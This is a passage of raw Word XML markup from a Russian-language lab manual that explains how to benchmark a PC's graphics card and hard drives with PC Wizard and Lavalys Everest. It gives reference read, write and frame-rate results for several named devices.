      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="1860150" cy="1178264"/>
            <wp:effectExtent l="19050" t="0" r="6750" b="0"/>
            <wp:docPr id="53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67" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="1862260" cy="1179600"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:solidFill>
                      <a:srgbClr val="FFFFFF"/>
                    </a:solidFill>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="005918E0" w:rsidRPr="00617AC0" w:rsidRDefault="005918E0" w:rsidP="005918E0">
      <w:pPr>
        <w:pStyle w:val="af8"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:right="0" w:firstLine="567"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Рисунок 16 – Тест графического процессора</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005918E0" w:rsidRPr="00617AC0" w:rsidRDefault="005918E0" w:rsidP="005918E0">
      <w:pPr>
        <w:pStyle w:val="af4"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Эталоны: </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ATI Mobility Radeon HD 2300 – 25.12 FPS;</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NVIDIA GeForce Go 7700 – 13 FPS.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005918E0" w:rsidRPr="00617AC0" w:rsidRDefault="005918E0" w:rsidP="005918E0">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:noProof/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="2515350" cy="1596244"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:docPr id="53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68" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2514235" cy="1595536"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="005918E0" w:rsidRPr="00617AC0" w:rsidRDefault="005918E0" w:rsidP="005918E0">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Рисунок 17 – Тест «рендеринг»</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 xml:space="preserve">3.1.2 Тестирование при помощи </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>PC</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Wizard</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005918E0" w:rsidRPr="00617AC0" w:rsidRDefault="005918E0" w:rsidP="005918E0">
      <w:pPr>
        <w:pStyle w:val="af4"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Чтобы начать тестирование во вкладке «тест» выберите «тест видео/</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>DirectX</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> 3</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>D</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>» (рис. 18). После окончания теста, результаты можно сравнить, нажав «</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Compare results</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>».</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005918E0" w:rsidRPr="00617AC0" w:rsidRDefault="005918E0" w:rsidP="005918E0">
      <w:pPr>
        <w:pStyle w:val="af4"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="2076150" cy="1707624"/>
            <wp:effectExtent l="19050" t="0" r="300" b="0"/>
            <wp:docPr id="5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69" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2076922" cy="1708259"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="005918E0" w:rsidRPr="00617AC0" w:rsidRDefault="005918E0" w:rsidP="005918E0">
      <w:pPr>
        <w:pStyle w:val="af4"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Рисунок 18– Тест видео/</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>DirectX</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> 3</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>D</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4 Тестирование физических накопителей</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005918E0" w:rsidRPr="00617AC0" w:rsidRDefault="005918E0" w:rsidP="005918E0">
      <w:pPr>
        <w:pStyle w:val="af4"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">4.1 Тестирование при помощи </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Lavalys</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Everest</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005918E0" w:rsidRPr="00617AC0" w:rsidRDefault="005918E0" w:rsidP="005918E0">
      <w:pPr>
        <w:pStyle w:val="af4"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Для тестирования диска будем использовать программу </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Lavalys</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Everest</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, так как она позволяет выбирать размер блоков для тестов «чтения» и «записи». Для запуска теста в панели меню «Сервис» выберите «Тест диска» (рис. 19).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005918E0" w:rsidRPr="00617AC0" w:rsidRDefault="005918E0" w:rsidP="005918E0">
      <w:pPr>
        <w:pStyle w:val="15"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="567"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="2436150" cy="1693502"/>
            <wp:effectExtent l="19050" t="0" r="2250" b="0"/>
            <wp:docPr id="5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70" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2434980" cy="1692688"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:solidFill>
                      <a:srgbClr val="FFFFFF"/>
                    </a:solidFill>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="005918E0" w:rsidRPr="00617AC0" w:rsidRDefault="005918E0" w:rsidP="005918E0">
      <w:pPr>
        <w:pStyle w:val="af8"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:right="0" w:firstLine="567"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Рисунок 19 – Общий вид теста накопителей в </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Lavalys</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Everest</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005918E0" w:rsidRPr="00617AC0" w:rsidRDefault="005918E0" w:rsidP="005918E0">
      <w:pPr>
        <w:pStyle w:val="af8"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:right="0" w:firstLine="567"/>
        <w:jc w:val="both"/>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 xml:space="preserve">Выберите тестируемый накопитель </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Disk</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Drive</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> #1 (рис.20).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005918E0" w:rsidRPr="00617AC0" w:rsidRDefault="005918E0" w:rsidP="005918E0">
      <w:pPr>
        <w:pStyle w:val="15"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="567"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="4243350" cy="213566"/>
            <wp:effectExtent l="19050" t="0" r="4800" b="0"/>
            <wp:docPr id="53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71" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4248128" cy="213806"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:solidFill>
                      <a:srgbClr val="FFFFFF"/>
                    </a:solidFill>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="005918E0" w:rsidRPr="00617AC0" w:rsidRDefault="005918E0" w:rsidP="005918E0">
      <w:pPr>
        <w:pStyle w:val="af8"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:right="0" w:firstLine="567"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Рисунок 20 – Выбор физического накопителя</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4.1.1 Тест «Чтение данных»</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005918E0" w:rsidRPr="00617AC0" w:rsidRDefault="005918E0" w:rsidP="005918E0">
      <w:pPr>
        <w:pStyle w:val="af4"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>В настройках «</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Options</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">» выберите размер блока 4 Кбайта, выберите тест «Linear Read» и затем нажмите кнопку «Start». За результат будем принимать среднее значение – «Average». Тестирование следует проводить не менее 15 секунд. Тест повторить с блоком 1 Мбайт. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005918E0" w:rsidRPr="00617AC0" w:rsidRDefault="005918E0" w:rsidP="005918E0">
      <w:pPr>
        <w:pStyle w:val="af4"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Эталонные результаты (среднее значение – «Average», блоки 4 Кб):</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 xml:space="preserve">Western Digital 3200YS 320Gb – 32.2 </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Мб</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>с</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>;</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 xml:space="preserve">Samsung 1614N 160Gb – 45.8 </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Мб</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>с</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005918E0" w:rsidRPr="00617AC0" w:rsidRDefault="005918E0" w:rsidP="00A64EB1">
      <w:pPr>
        <w:pStyle w:val="a"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="42"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="567"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Hitachi HTS 541616 – 24.4 Мб/с.</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4.1.2 Тест «Запись данных»</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005918E0" w:rsidRPr="00617AC0" w:rsidRDefault="005918E0" w:rsidP="005918E0">
      <w:pPr>
        <w:pStyle w:val="af4"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Для начала теста в настройках «Options» выберите «Write Tests», размер</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005918E0" w:rsidRPr="00617AC0" w:rsidRDefault="005918E0" w:rsidP="005918E0">
      <w:pPr>
        <w:pStyle w:val="af4"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> блока 4Кбайта, выберите тест «Linear Write» и затем нажмите кнопку «Start». За результат будем принимать среднее значение – «Average». Тестирование следует проводить не менее 15 секунд. Тест повторить с блоком 1Мбайт.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005918E0" w:rsidRPr="00617AC0" w:rsidRDefault="005918E0" w:rsidP="005918E0">
      <w:pPr>
        <w:pStyle w:val="af4"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Эталонные результаты (среднее значение – «</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Average</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>», блоки 4 Кб):</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 xml:space="preserve">Western Digital 3200YS 320Gb – 15.1 </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Мб</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>с</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>;</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 xml:space="preserve">Samsung 1614N 160Gb – 17.4 </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Мб</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>с</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005918E0" w:rsidRPr="00617AC0" w:rsidRDefault="005918E0" w:rsidP="00A64EB1">
      <w:pPr>
        <w:pStyle w:val="a"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="42"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="567"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Hitachi HTS 541616 – 10.6 Мб/с.</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4.1.3 Тест «среднее время доступа при операции чтения»</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005918E0" w:rsidRPr="00617AC0" w:rsidRDefault="005918E0" w:rsidP="005918E0">
      <w:pPr>
        <w:pStyle w:val="af4"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Многие уделяют «времени доступа» малое значение, ориентируясь только на линейные скорости — в реальных условиях последние достижимы при записи и чтении больших </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>объемов данных (например, копируя на накопитель фильм, размером с сам накопитель). При попытке работы с содержимым устройства блоками разного размера, при случайных чтениях и записях и т.п. время доступа вполне может выйти на первый план. То есть при копировании большого количества файлов малого размера скорость будет меньше по сравнению с копированием одного большого файла.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005918E0" w:rsidRPr="00617AC0" w:rsidRDefault="005918E0" w:rsidP="005918E0">
      <w:pPr>
        <w:pStyle w:val="af4"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
